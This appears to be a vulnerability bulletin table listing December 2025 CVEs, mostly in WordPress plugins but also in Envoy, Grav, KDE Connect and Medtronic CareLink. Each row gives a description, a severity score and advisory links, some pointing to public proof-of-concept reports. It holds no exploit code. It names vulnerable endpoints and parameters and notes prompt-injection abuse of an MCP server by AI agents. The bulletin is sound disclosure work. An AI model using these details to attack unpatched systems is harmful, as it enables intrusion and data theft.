| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.3.2. This is due to missing authorization checks on the eh_crm_edit_agent AJAX action. This makes it possible for authenticated attackers, with Contributor-level access and above, to escalate their WSDesk privileges from limited "Reply Tickets" permissions to full helpdesk administrator capabilities, gaining unauthorized access to ticket management, settings configuration, agent administration, and sensitive customer data. | 2025-12-02 | 6.3 | CVE-2025-13534 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3541794b-7c8a-42f8-9688-7f3dbbb08e58?source=cve https://plugins.trac.wordpress.org/browser/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-ajax-functions-two.php#L9 https://plugins.trac.wordpress.org/browser/elex-helpdesk-customer-support-ticket-system/tags/3.3.2/includes/class-crm-ajax-functions-two.php#L9 https://plugins.trac.wordpress.org/browser/stm-gallery/trunk/stmgallery_v.0.9.php#L121 |
| emaude--Canadian Nutrition Facts Label | The Canadian Nutrition Facts Label plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'percentage' field in the Nutrition Label custom post type in all versions up to, and including, 3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-12715 | https://www.wordfence.com/threat-intel/vulnerabilities/id/950e5d04-1436-4886-8d36-fca38bd9414a?source=cve https://plugins.trac.wordpress.org/browser/canadian-nutrition-facts-label/tags/3.0/canadian-nutrition-facts-label.php#L557 |
| envoyproxy--envoy | Envoy is a high-performance edge/middle/service proxy. In 1.33.12, 1.34.10, 1.35.6, 1.36.2, and earlier, Envoy crashes when JWT authentication is configured with the remote JWKS fetching, allow_missing_or_failed is enabled, multiple JWT tokens are present in the request headers and the JWKS fetch fails. This is caused by a re-entry bug in the JwksFetcherImpl. When the first token's JWKS fetch fails, onJwksError() callback triggers processing of the second token, which calls fetch() again on the same fetcher object. The original callback's reset() then clears the second fetch's state (receiver_ and request_) which causes a crash when the async HTTP response arrives. | 2025-12-03 | 6.5 | CVE-2025-64527 | https://github.com/envoyproxy/envoy/security/advisories/GHSA-mp85-7mrq-r866 |
| envoyproxy--envoy | Envoy is a high-performance edge/middle/service proxy. In 1.33.12, 1.34.10, 1.35.6, 1.36.2, and earlier, Envoy's mTLS certificate matcher for match_typed_subject_alt_names may incorrectly treat certificates containing an embedded null byte (\0) inside an OTHERNAME SAN value as valid matches. | 2025-12-03 | 5 | CVE-2025-66220 | https://github.com/envoyproxy/envoy/security/advisories/GHSA-rwjg-c3h2-f57p |
| error311--FileRise | FileRise is a self-hosted web-based file manager with multi-file upload, editing, and batch operations. Prior to 2.2.3, a stored cross-site scripting (XSS) vulnerability exists in the FileRise application due to improper handling of uploaded SVG files. The application accepts user-supplied SVG uploads without sanitizing or restricting embedded script content. When a malicious SVG containing inline JavaScript or event-based payloads is uploaded, it is later rendered directly in the browser whenever viewed within the application. Because SVGs are XML-based and allow scripting, they execute in the origin context of the application, enabling full stored XSS. This vulnerability is fixed in 2.2.3. | 2025-12-01 | 4.6 | CVE-2025-66403 | https://github.com/error311/FileRise/security/advisories/GHSA-qrcv-vjvf-fr29 https://github.com/error311/FileRise/commit/f2ce43f18f0444f8f63f7c33758d1837dd5ba91e |
| everestthemes--Everest Backup WordPress Cloud Backup, Migration, Restore & Cloning Plugin | The Everest Backup - WordPress Cloud Backup, Migration, Restore & Cloning Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the process_status_unlink() function in all versions up to, and including, 2.3.8. This makes it possible for unauthenticated attackers to delete the back-up progress files and cause a back-up to fail while it is in progress. | 2025-12-03 | 5.3 | CVE-2025-10304 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f7d7c619-7dc0-47a5-a203-6df4dfa0158b?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3400800%40everest-backup&new=3400800%40everest-backup&sfp_email=&sfph_mail= |
| Facebook--proxygen | Sending an HTTP request/response body with greater than 2^31 bytes triggers an infinite loop in proxygen::coro::HTTPQuicCoroSession which blocks the backing event loop and unconditionally appends data to a std::vector per-loop iteration. This issue leads to unbounded memory growth and eventually causes the process to run out of memory. | 2025-12-02 | 5.3 | CVE-2025-55181 | https://www.facebook.com/security/advisories/cve-2025-55181 https://github.com/facebook/proxygen/commit/17689399ef99b7c3d3a8b2b768b1dba1a4b72f8f |
| fit2cloud--Halo | A vulnerability has been found in fit2cloud Halo 2.21.10. Impacted is an unknown function. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 4.3 | CVE-2025-14117 | VDB-334494; fit2cloud Halo cross-site request forgery VDB-334494; CTI Indicators (IOB, IOC); Submit #697391: fit2cloud Halo 2.21.10 Cross-Site Request Forgery https://blksword.flowus.cn/ https://github.com/BlkSword/POC |
| floragunn--Search Guard FLX | In Search Guard FLX versions from 3.1.0 up to 4.0.0 with enterprise modules being disabled, there exists an issue which allows authenticated users to use specially crafted requests to read documents from data streams without having the respective privileges. | 2025-12-01 | 4.3 | CVE-2025-13653 | https://search-guard.com/cve-advisory/ https://docs.search-guard.com/latest/changelog-searchguard-flx-4_0_1 |
| Flux159--mcp-server-kubernetes | MCP Server Kubernetes is an MCP Server that can connect to a Kubernetes cluster and manage it. Prior to 2.9.8, a security issue exists in the exec_in_pod tool of the mcp-server-kubernetes MCP Server. The tool accepts user-provided commands in both array and string formats. When a string format is provided, it is passed directly to shell interpretation (sh -c) without input validation, allowing shell metacharacters to be interpreted. This vulnerability can be exploited through direct command injection or indirect prompt injection attacks, where AI agents may execute commands without explicit user intent. This vulnerability is fixed in 2.9.8. | 2025-12-03 | 6.4 | CVE-2025-66404 | https://github.com/Flux159/mcp-server-kubernetes/security/advisories/GHSA-wvxp-jp4w-w8wg https://github.com/Flux159/mcp-server-kubernetes/commit/d091107ff92d9ffad1b3c295092f142d6578c48b |
| Fortra--GoAnywhere MFT | An Improper Access Control in the SFTP service in Fortra's GoAnywhere MFT prior to version 7.9.0 allows Web Users with an Authentication Alias and a valid SSH key but limited to Password authentication for SFTP to still login using their SSH key. | 2025-12-05 | 4.2 | CVE-2025-8148 | https://www.fortra.com/security/advisories/product-security/fi-2025-013 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to 15.86.0 and 14.99.2, certain requests were vulnerable to path traversal attacks, wherein some files from the server could be retrieved if the full path was known. Sites hosted on Frappe Cloud, and even other setups that are behind a reverse proxy like NGINX are unaffected. This would mainly affect someone directly using werkzeug/gunicorn. In those cases, either an upgrade or changing the setup to use a reverse proxy is recommended. This vulnerability is fixed in 15.86.0 and 14.99.2. | 2025-12-01 | 6.8 | CVE-2025-66206 | https://github.com/frappe/frappe/security/advisories/GHSA-v4wg-gqfr-rpjm |
| garidium--g-FFL Cockpit | The g-FFL Cockpit plugin for WordPress is vulnerable to unauthorized modification of data due to IP-based authorization that can be spoofed in the handle_enqueue_only() function in all versions up to, and including, 1.7.1. This makes it possible for unauthenticated attackers to delete arbitrary products. | 2025-12-06 | 5.3 | CVE-2025-12720 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3405974d-cf0a-4fef-9693-5d81833f42d6?source=cve https://plugins.trac.wordpress.org/browser/g-ffl-cockpit/trunk/includes/class-update-processor.php#L634 https://github.com/d0n601/CVE-2025-12720 https://ryankozak.com/posts/cve-2025-12720/ |
| garidium--g-FFL Cockpit | The g-FFL Cockpit plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.7.1 via the /server_status REST API endpoint due to a lack of capability checks. This makes it possible for unauthenticated attackers to extract information about the server. | 2025-12-06 | 5.3 | CVE-2025-12721 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2fd8c981-081c-4671-ad1e-3caf004669dd?source=cve https://plugins.trac.wordpress.org/browser/g-ffl-cockpit/trunk/includes/class-sync-endpoint.php#L1385 https://github.com/d0n601/CVE-2025-12721 https://ryankozak.com/posts/cve-2025-12721/ |
| georgestephanis--Application Passwords | The Application Passwords plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'reject_url' parameter in all versions up to, and including, 0.1.3. This is due to insufficient input sanitization and output escaping on user supplied URLs, which allows javascript: URI schemes to be embedded in the reject_url parameter. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute when a user clicks the "No, I do not approve of this connection" button, granted they can successfully trick the victim into performing an action such as clicking on a link. | 2025-12-06 | 5.4 | CVE-2025-13308 | https://www.wordfence.com/threat-intel/vulnerabilities/id/59fdfdf3-e9fe-44d2-82f4-7a612a51d376?source=cve https://plugins.trac.wordpress.org/browser/application-passwords/tags/0.1.3/auth-app.js#L61 https://plugins.trac.wordpress.org/browser/application-passwords/tags/0.1.3/class.application-passwords.php#L418 https://plugins.trac.wordpress.org/browser/application-passwords/tags/0.1.3/class.application-passwords.php#L432 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a path traversal vulnerability has been identified in Grav CMS, allowing authenticated attackers with administrative privileges to read arbitrary files on the underlying server filesystem. This vulnerability arises due to insufficient input sanitization in the backup tool, where user-supplied paths are not properly restricted, enabling access to files outside the intended webroot directory. The impact of this vulnerability depends on the privileges of the user account running the application. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | 6.8 | CVE-2025-66302 | https://github.com/getgrav/grav/security/advisories/GHSA-j422-qmxp-hv94 https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, users with read access on the user account management section of the admin panel can view the password hashes of all users, including the admin user. This exposure can potentially lead to privilege escalation if an attacker can crack these password hashes. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | 6.2 | CVE-2025-66304 | https://github.com/getgrav/grav/security/advisories/GHSA-gq3g-666w-7h85 https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7 |
| getgrav--grav | This admin plugin for Grav is an HTML user interface that provides a convenient way to configure Grav and easily create and modify pages. Prior to 1.11.0-beta.1, a user enumeration and email disclosure vulnerability exists in Grav. The "Forgot Password" functionality at /admin/forgot leaks information about valid usernames and their associated email addresses through distinct server responses. This allows an attacker to enumerate users and disclose sensitive email addresses, which can be leveraged for targeted attacks such as password spraying, phishing, or social engineering. This vulnerability is fixed in 1.11.0-beta.1. | 2025-12-01 | 6.5 | CVE-2025-66307 | https://github.com/getgrav/grav/security/advisories/GHSA-q3qx-cp62-f6m7 https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a Denial of Service (DoS) vulnerability has been identified in Grav related to the handling of scheduled_at parameters. Specifically, the application fails to properly sanitize input for cron expressions. By manipulating the scheduled_at parameter with a malicious input, such as a single quote, the application admin panel becomes non-functional, causing significant disruptions to administrative operations. The only way to recover from this issue is to manually access the host server and modify the backup.yaml file to correct the corrupted cron expression. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | 4.9 | CVE-2025-66303 | https://github.com/getgrav/grav/security/advisories/GHSA-x62q-p736-3997 https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, there is an IDOR (Insecure Direct Object Reference) vulnerability in the Grav CMS Admin Panel which allows low-privilege users to access sensitive information from other accounts. Although direct account takeover is not possible, admin email addresses and other metadata can be exposed, increasing the risk of phishing, credential stuffing, and social engineering. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | 4.3 | CVE-2025-66306 | https://github.com/getgrav/grav/security/advisories/GHSA-4cwq-j7jv-qmwg https://github.com/getgrav/grav/commit/b7e1958a6e807ac14919447b60e5204a2ea77f62 |
| HCL Software--BigFix SaaS Remediate | The BigFix SaaS's HTTP responses were missing some security headers. The absence of these headers weakens the application's client-side security posture, making it more vulnerable to common web attacks that these headers are designed to mitigate, such as Cross-Site Scripting (XSS), Clickjacking, and protocol downgrade attacks. | 2025-12-02 | 5.4 | CVE-2025-52622 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127171 |
| helloprint--Plug your WooCommerce into the largest catalog of customized print products from Helloprint | The Helloprint plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.1.2. This is due to the plugin registering a public REST API endpoint without implementing authorization checks to verify request authenticity. This makes it possible for unauthenticated attackers to arbitrarily modify WooCommerce order statuses via the /wp-json/helloprint/v1/complete_order_from_helloprint_callback endpoint by providing a valid order reference ID. | 2025-12-06 | 5.3 | CVE-2025-13666 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4b07ed75-6ee3-4a1a-b165-439a9135b059?source=cve https://plugins.trac.wordpress.org/browser/helloprint/trunk/includes/Base/Controllers/Admin/OrderController.php#L48 https://plugins.trac.wordpress.org/browser/helloprint/tags/2.1.2/includes/Base/Controllers/Admin/OrderController.php#L48 |
| Himool--ERP | A vulnerability was identified in Himool ERP up to 2.2. Affected by this issue is the function update_account of the file /api/admin/update_account/ of the component AdminActionViewSet. Such manipulation leads to improper authorization. The attack may be performed from remote. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 6.3 | CVE-2025-14089 | VDB-334479; Himool ERP AdminActionViewSet update_account improper authorization VDB-334479; CTI Indicators (IOB, IOC, TTP, IOA); Submit #696049: https://gitee.com/himool/erp Himool ERP 2.2 Missing Authentication for Critical Function https://github.com/caigo8/CVE-md/blob/main/BoxwoodERP/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE.md |
| huyme--Webcake Landing Page Builder | The Webcake - Landing Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'webcake_save_config' AJAX endpoint in all versions up to, and including, 1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify the plugin's settings. | 2025-12-05 | 4.3 | CVE-2025-12165 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3bdeb2a1-ab97-45ff-808e-37e631d5e9cf?source=cve https://wordpress.org/plugins/webcake/ |
| instantsearchplus--Search, Filters & Merchandising for WooCommerce | The Search, Filters & Merchandising for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wcis_save_email' endpoint in all versions up to, and including, 3.0.63. This makes it possible for authenticated attackers, with Subscriber-level access and above, to deactivate the plugin. | 2025-12-06 | 4.3 | CVE-2025-12091 | https://www.wordfence.com/threat-intel/vulnerabilities/id/daa8f941-6e87-4b94-8526-f73770fe6f82?source=cve https://plugins.trac.wordpress.org/browser/instantsearch-for-woocommerce/tags/3.0.64/public/wcis_plugin.php#L1074 https://plugins.trac.wordpress.org/browser/instantsearch-for-woocommerce/trunk/public/wcis_plugin.php#L1074 |
| jairiidriss--RestaurantWebsite | A vulnerability was determined in jairiidriss RestaurantWebsite up to e7911f12d035e8e2f9a75e7a28b59e4ef5c1d654. Impacted is an unknown function of the component Make a Reservation. This manipulation of the argument selected_date causes cross site scripting. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. Continuous delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 4.3 | CVE-2025-13802 | VDB-333812; jairiidriss RestaurantWebsite Make a Reservation cross site scripting VDB-333812; CTI Indicators (IOB, IOC, TTP, IOA) Submit #691839; restaurant-website-php-mysql-master web 1 XSS vulnerability https://github.com/dream357/report/blob/main/restaurant-website-report.docx |
| jevgenisultanov--Norby AI | The Norby AI plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.3. This is due to missing nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-13362 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7dc6f6e2-6777-4056-95d0-e3d3e7ad7a22?source=cve https://plugins.trac.wordpress.org/browser/norby-ai/trunk/api/save.php#L23 https://plugins.trac.wordpress.org/browser/norby-ai/tags/1.0.3/api/save.php#L23 |
| jiangxin--CoSign Single Signon | The CoSign Single Signon plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` parameter in all versions up to, and including, 0.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-05 | 6.1 | CVE-2025-13512 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0bbeab52-59a9-4d8d-8e3e-ebcbbca9816b?source=cve https://plugins.trac.wordpress.org/browser/cosign-sso/trunk/cosign-sso.php#L423 https://plugins.trac.wordpress.org/browser/cosign-sso/tags/0.3.1/cosign-sso.php#L423 |
| jimmyredline80--SSP Debug | The SSP Debug plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.0. This is due to the plugin storing PHP error logs in a predictable, web-accessible location (wp-content/uploads/ssp-debug/ssp-debug.log) without any access controls. This makes it possible for unauthenticated attackers to view sensitive debugging information including full URLs, client IP addresses, User-Agent strings, WordPress user IDs, and internal filesystem paths. | 2025-12-05 | 5.3 | CVE-2025-13494 | https://www.wordfence.com/threat-intel/vulnerabilities/id/66f29499-1522-43cd-af78-9b734c66af8c?source=cve https://plugins.trac.wordpress.org/browser/ssp-debugging/trunk/ssp-debug.php#L221 https://plugins.trac.wordpress.org/browser/ssp-debugging/tags/1.0.0/ssp-debug.php#L221 |
| jsnjfz--WebStack-Guns | A vulnerability was determined in jsnjfz WebStack-Guns 1.0. This vulnerability affects unknown code of the file src/main/java/com/jsnjfz/manage/core/common/constant/factory/PageFactory.java. Executing manipulation of the argument sort can lead to sql injection. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 6.3 | CVE-2025-13811 | VDB-333821; jsnjfz WebStack-Guns PageFactory.java sql injection VDB-333821; CTI Indicators (IOB, IOC, TTP, IOA) Submit #692084; WebStack-Guns Project WebStack-Guns 1.0 SQL Injection https://github.com/Xzzz111/exps/blob/main/archives/WebStack-Guns-SQLInjection-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/WebStack-Guns-SQLInjection-1/report.md#proof-of-concept |
| jsnjfz--WebStack-Guns | A vulnerability was found in jsnjfz WebStack-Guns 1.0. This affects the function renderPicture of the file src/main/java/com/jsnjfz/manage/modular/system/controller/KaptchaController.java. Performing manipulation results in path traversal. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 5.3 | CVE-2025-13810 | VDB-333820; jsnjfz WebStack-Guns KaptchaController.java renderPicture path traversal VDB-333820; CTI Indicators (IOB, IOC, TTP, IOA) Submit #692080; WebStack-Guns Project (GitHub organization jsnjfz) WebStack-Guns 1.0 (latest master) Path Traversal / Arbitrary File Read (CWE-22) https://github.com/Xzzz111/exps/blob/main/archives/WebStack-Guns-PathTraversal-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/WebStack-Guns-PathTraversal-1/report.md#proof-of-concept |
| kaushikankrani--Hide Categories Or Products On Shop Page | The Hide Categories Or Products On Shop Page plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7. This is due to missing or incorrect nonce validation on the save_data_hcps() function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-12128 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b649266a-6a9a-4d2e-9a82-2335e96bfe0d?source=cve https://wordpress.org/plugins/hide-categories-or-products-on-shop-page/ |
| KDE--KDE Connect information-exchange protocol | In the KDE Connect information-exchange protocol before 2025-04-18, a packet can be crafted to temporarily change the displayed information about a device, because broadcast UDP is used. This affects KDE Connect before 1.33.0 on Android, KDE Connect before 25.04 on desktop, KDE Connect before 0.5 on iOS, Valent before 1.0.0.alpha.47, and GSConnect before 59. | 2025-12-05 | 4.3 | CVE-2025-32900 | https://kdeconnect.kde.org https://kde.org/info/security/advisory-20250418-2.txt |
| KDE--KDE Connect protocol | The KDE Connect protocol 8 before 2025-11-28 does not correlate device IDs across two packets. This affects KDE Connect before 25.12 on desktop, KDE Connect before 0.5.4 on iOS, KDE Connect before 1.34.4 on Android, GSConnect before 68, and Valent before 1.0.0.alpha.49. | 2025-12-05 | 4.7 | CVE-2025-66270 | https://invent.kde.org/network/kdeconnect-kde/-/commit/4e53bcdd5d4c28bd9fefd114b807ce35d7b3373e https://invent.kde.org/network/kdeconnect-android/-/commit/675d2d24a1eb95d15d9e5bde2b7e2271d5ada6a9 https://invent.kde.org/network/kdeconnect-ios/-/commit/6c003c22d04270cabc4b262d399c753d55cf9080 https://github.com/GSConnect/gnome-shell-extension-gsconnect/commit/a38246deec0af50ae218cdc51db32cdd7eb145e3 https://github.com/andyholmes/valent/commit/85f773124a67ed1add79e7465bb088ec667cccce https://kde.org/info/security/advisory-20251128-1.txt |
| KDE--KDE Connect verification-code protocol | The KDE Connect verification-code protocol before 2025-04-18 uses only 8 characters and therefore allows brute-force attacks. This affects KDE Connect before 1.33.0 on Android, KDE Connect before 25.04 on desktop, KDE Connect before 0.5 on iOS, Valent before 1.0.0.alpha.47, and GSConnect before 59. | 2025-12-05 | 4.7 | CVE-2025-32898 | https://kdeconnect.kde.org https://kde.org/info/security/advisory-20250418-3.txt |
| KDE--KDEConnect | In KDE Connect before 1.33.0 on Android, a packet can be crafted that causes two paired devices to unpair. Specifically, it is an invalid discovery packet sent over broadcast UDP. | 2025-12-05 | 4.3 | CVE-2025-32899 | https://kdeconnect.kde.org https://kde.org/info/security/advisory-20250418-1.txt |
| KDE--KDEConnect | In KDE Connect before 1.33.0 on Android, malicious device IDs (sent via broadcast UDP) could cause an application crash. | 2025-12-05 | 4.3 | CVE-2025-32901 | https://kdeconnect.kde.org https://kde.org/info/security/advisory-20250418-4.txt |
| ketr--JEPaaS | A vulnerability was determined in ketr JEPaaS up to 7.2.8. Affected by this vulnerability is an unknown functionality of the file /je/load. This manipulation of the argument Authorization causes improper authorization. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-05 | 6.3 | CVE-2025-14088 | VDB-334478; ketr JEPaaS load improper authorization VDB-334478; CTI Indicators (IOB, IOC, TTP, IOA) Submit #695316; Beijing Kaite Weiye Science and Technology Co.,Ltd. JEPaaS JEPaaSV7.2.8 vertical privilege escalation vulnerability https://github.com/zhangbuneng/The-Jepaas-platform-has-a-vertical-privilege-escalation-vulnerability./issues/1 |
| kevindees--FitVids for WordPress | The FitVids for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-05 | 4.4 | CVE-2025-12124 | https://www.wordfence.com/threat-intel/vulnerabilities/id/063a245d-bd9e-49ac-bdf0-549a25eba9fe?source=cve https://wordpress.org/plugins/fitvids-for-wordpress/ |
| krupenik--RevInsite | The RevInsite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `token` parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-13863 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c52de26a-d52c-4b2e-8e51-731115d29bd0?source=cve https://plugins.trac.wordpress.org/browser/revinsite/trunk/revinsite.php#L25 https://plugins.trac.wordpress.org/browser/revinsite/tags/1.1.0/revinsite.php#L25 |
| ksakai--Yet Another WebClap for WordPress | The Yet Another WebClap for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'text' parameter of the webclap_button shortcode in all versions up to, and including, 0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-13857 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ca50e5e7-be46-40f1-9782-a72ca8ab7e9a?source=cve https://plugins.trac.wordpress.org/browser/yet-another-webclap-for-wordpress/trunk/yawebclap.php#L28 https://plugins.trac.wordpress.org/browser/yet-another-webclap-for-wordpress/tags/0.2/yawebclap.php#L28 |
| LINE Corporation--Central Dogma | Central Dogma versions before 0.78.0 contain an Open Redirect vulnerability that allows attackers to redirect users to untrusted sites via specially crafted URLs, potentially facilitating phishing attacks and credential theft. | 2025-12-04 | 6.1 | CVE-2025-11222 | https://github.com/line/centraldogma/security/advisories/GHSA-4hr2-xf7w-jf76 |
| linkwhspr--Link Whisper Free | The Link Whisper Free plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the type parameter in all versions up to, and including, 0.8.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-06 | 6.1 | CVE-2025-11263 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7e0cbef8-223a-44c0-a07f-28de2670da99?source=cve https://plugins.trac.wordpress.org/changeset/3401477/link-whisper/trunk/core/Wpil/Report.php |
| listingthemes--WP Directory Kit | The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'search' parameter in all versions up to, and including, 1.4.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-02 | 4.9 | CVE-2025-13090 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d0fbf502-2dfb-49e5-94a6-1525aabc08c1?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396348%40wpdirectorykit&new=3396348%40wpdirectorykit&sfp_email=&sfph_mail= https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3405484%40wpdirectorykit&new=3405484%40wpdirectorykit&sfp_email=&sfph_mail= |
| macrozheng--mall-swarm | A security vulnerability has been detected in macrozheng mall-swarm up to 1.0.3. Affected is the function delete of the file /member/readHistory/delete. Such manipulation of the argument ids leads to improper authorization. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 5.4 | CVE-2025-14016 | VDB-334257; macrozheng mall-swarm delete improper authorization VDB-334257; CTI Indicators (IOB, IOC, TTP, IOA) Submit #694797; mall-swarm <=1.0.3 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/17 |
| Mattermost--Mattermost | Mattermost versions 11.0.x <= 11.0.2, 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12 fail to validate user permissions when deleting comments in Boards, which allows an authenticated user with the editor role to delete comments created by other users. | 2025-12-01 | 4.3 | CVE-2025-12756 | https://mattermost.com/security-updates |
| Medtronic--CareLink Network | Medtronic CareLink Network allows an unauthenticated remote attacker to initiate a request for security questions to an API endpoint that could be used to determine a valid user account. This issue affects CareLink Network: before December 4, 2025. | 2025-12-04 | 5.3 | CVE-2025-12994 | https://www.medtronic.com/en-us/e/product-security/security-bulletins/carelink-network-vulnerabilities.html |
| Medtronic--CareLink Network | Medtronic CareLink Network allows a local attacker with access to log files on an internal API server to view plaintext passwords from errors logged under certain circumstances. This issue affects CareLink Network: before December 4, 2025. | 2025-12-04 | 4.1 | CVE-2025-12996 | https://www.medtronic.com/en-us/e/product-security/security-bulletins/carelink-network-vulnerabilities.html |
| michael_j_reid--Weekly Planner | The Weekly Planner plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-05 | 4.4 | CVE-2025-12186 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1cd2d269-5af2-40ab-b424-505c95c56688?source=cve https://wordpress.org/plugins/weekly-planner/#description |
| michaelcole1991--Extra Post Images | The Extra Post Images plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter of the extra-images shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-13856 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c5fbb963-f89d-4037-9456-8587bcf5d620?source=cve https://plugins.trac.wordpress.org/browser/extra-post-images/trunk/epi.php#L92 https://plugins.trac.wordpress.org/browser/extra-post-images/tags/1.0/epi.php#L92 https://plugins.trac.wordpress.org/browser/extra-post-images/tags/1.0/epi.php#L101 |
